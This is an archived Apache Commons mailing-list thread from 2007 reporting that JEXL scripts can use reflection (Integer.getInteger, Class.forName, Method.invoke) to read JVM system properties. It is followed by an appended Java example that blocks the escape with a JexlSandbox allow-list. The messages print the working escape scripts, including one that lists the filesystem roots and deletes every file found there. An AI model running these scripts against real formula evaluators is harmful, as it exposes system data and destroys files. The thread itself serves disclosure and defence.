Posted to user@commons.apache.org by Trevor Harrison <tr...@gmail.com> on 2007/10/04 22:46:19 UTC

JEXL security issue with system properties

It seems like JEXL allows scripts to access some JVM system
properties, via java.lang.Integer's getInteger( String sys_prop_name )
method:

i = 0; j = i.getInteger("sun.arch.data.model");

Getting the value of system properties that are completely numbers
might not be that big of an issue, but it brings up the question of
other system properties leaking out.

I've eyeballed java.lang.String, and it doesn't seem to have a similar method.

While looking for other ways to 'break' out, I started thinking about
classloaders.  I haven't succeeded in getting a classloader yet in a
script, but if I could, it would be bad for my intended usage of JEXL
(as a fairly secure way of executing user supplied formulas).

// this doesn't work
i = 0;
intClazz = i.class;
cl = intClazz.getClassLoader();  // this fails, returns a null
clazz = cl.loadClass( "java.lang.System" );
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);

I haven't had time to poke into the guts of JEXL yet, so does anyone
know if the failure to get a classloader is intentional, or just an
accidental feature?

-Trevor

---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org


Re: JEXL security issue with system properties

Posted by Dion Gillard <di...@trongus.com>.
JEXL doesn't place any security restrictions on what you can do with
the script itself.


On 10/6/07, Trevor Harrison <tr...@gmail.com> wrote:
> Replying to myself:
>
> On 10/4/07, Trevor Harrison <tr...@gmail.com> wrote:
> > While looking for other ways to 'break' out, I started thinking about
> > classloaders.  I haven't succeeded in getting a classloader yet in a
> > script, but if I could, it would be bad for my intended usage of JEXL
> > (as a fairly secure way of executing user supplied formulas).
> >
> > // this doesn't work
> > cl = intClazz.getClassLoader();  // this fails, returns a null
>
> Well, still not sure why that method is returning a null for the
> classloader, but if I call (the much simpler) clazz.forName(), I can
> get a reference to a class:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.lang.System");
> m = clazz.getMethod("getProperties", null);
> p = m.invoke(null, null);
>
> which successfully gets me the system properties.  Which is probably
> the least of my worries, considering I could do something like:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.io.File");
> m = clazz.getMethod("listRoots", null);
> roots = m.invoke(null, null);
> files = roots[0].listFiles();
> foreach( file in files )
> {
>   file.delete();
> }
>


-- 
dIon Gillard
Rule #131 of Acquisition: Information is Profit.



Re: JEXL security issue with system properties

Posted by Trevor Harrison <tr...@gmail.com>.
Replying to myself:

On 10/4/07, Trevor Harrison <tr...@gmail.com> wrote:
> While looking for other ways to 'break' out, I started thinking about
> classloaders.  I haven't succeeded in getting a classloader yet in a
> script, but if I could, it would be bad for my intended usage of JEXL
> (as a fairly secure way of executing user supplied formulas).
>
> // this doesn't work
> cl = intClazz.getClassLoader();  // this fails, returns a null

Well, still not sure why that method is returning a null for the
classloader, but if I call (the much simpler) clazz.forName(), I can
get a reference to a class:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.lang.System");
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);

which successfully gets me the system properties.  Which is probably
the least of my worries, considering I could do something like:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.io.File");
m = clazz.getMethod("listRoots", null);
roots = m.invoke(null, null);
files = roots[0].listFiles();
foreach( file in files )
{
  file.delete();
}

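Added example, not code from this thread or from the JEXL project: the escape script from Trevor's reply run against a JEXL engine built with an allow-list sandbox, next to a plain arithmetic formula that the same engine still evaluates. It assumes the JEXL 3.x API (JexlBuilder, JexlSandbox, MapContext and JexlException in org.apache.commons.jexl3), which the 2007-era JEXL in this thread did not have; the sandbox flag semantics (new JexlSandbox(false) gives no read/write/execute permission to any class without an explicit entry) are taken from the JEXL 3 javadoc and should be checked against the version in use. The class name FormulaSandbox, the formula and the variable values are made up for the illustration.

```java
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

/**
 * Added example (not from the thread or the JEXL project): user-supplied
 * formulas evaluated behind an allow-list sandbox, so the reflection escape
 * from the thread (i.class.forName(...)) is refused before it reaches
 * java.lang.Class. Assumes the JEXL 3.x API.
 */
public class FormulaSandbox {

    /** A legitimate formula: arithmetic on context variables only (made-up example). */
    static final String FORMULA = "(price * qty) * (1 - discount)";

    /** The escape from the thread, written as a JEXL 3 script (single-quoted strings). */
    static final String ESCAPE =
        "i = 0; intClazz = i.class; clazz = intClazz.forName('java.lang.System');"
      + " m = clazz.getMethod('getProperties', null); m.invoke(null, null);";

    /** Engine whose introspector refuses every class that is not explicitly listed. */
    static JexlEngine sandboxedEngine() {
        // Assumption from the JEXL 3 javadoc: false = classes without an entry get no
        // read/write/execute permission. i.class is a property read on java.lang.Integer,
        // so it is refused and forName() is never reached.
        JexlSandbox sandbox = new JexlSandbox(false);
        // Allow-list only what formulas actually need; nothing here can return a Class object.
        sandbox.white("java.lang.String").execute("length", "toUpperCase", "trim");
        return new JexlBuilder()
            .sandbox(sandbox)
            .strict(true)   // unknown variables/properties/methods throw instead of yielding null
            .silent(false)  // surface the JexlException rather than logging and continuing
            .create();
    }

    /**
     * Evaluates one script with its own copy of the variables (scripts may assign
     * context variables, as "i = 0" does). Returns the value, or the JexlException
     * when the sandbox or strict mode refused the script.
     */
    static Object evaluate(JexlEngine jexl, String source, Map<String, Object> vars) {
        try {
            return jexl.createScript(source).execute(new MapContext(new HashMap<>(vars)));
        } catch (JexlException e) {
            return e;
        }
    }

    public static void main(String[] args) {
        JexlEngine jexl = sandboxedEngine();
        Map<String, Object> vars = Map.of("price", 10.0, "qty", 3, "discount", 0.25);

        // Arithmetic never goes through the introspector, so the sandbox does not affect it.
        Object ok = evaluate(jexl, FORMULA, vars);
        // The escape fails at "i.class": the property read on Integer is unsolvable.
        Object refused = evaluate(jexl, ESCAPE, vars);

        System.out.println("formula -> " + ok);
        System.out.println("escape  -> " + refused);
    }
}
```

The shape matters more than the list of names: a formula only needs arithmetic on context variables, which never touches the introspector, so the allow-list can be nearly empty. A deny-list of forName, getClassLoader and similar methods is the wrong shape, because any other route to a Class object (or to a ClassLoader) reopens the same hole. On JEXL 3.3 and later the default engine already runs with restricted permissions (JexlPermissions.RESTRICTED, per the JEXL release notes; assumption, verify for your version), which refuses java.lang.Class and java.lang.System; when evaluating untrusted formulas, configure that explicitly rather than relying on whatever the default happens to be.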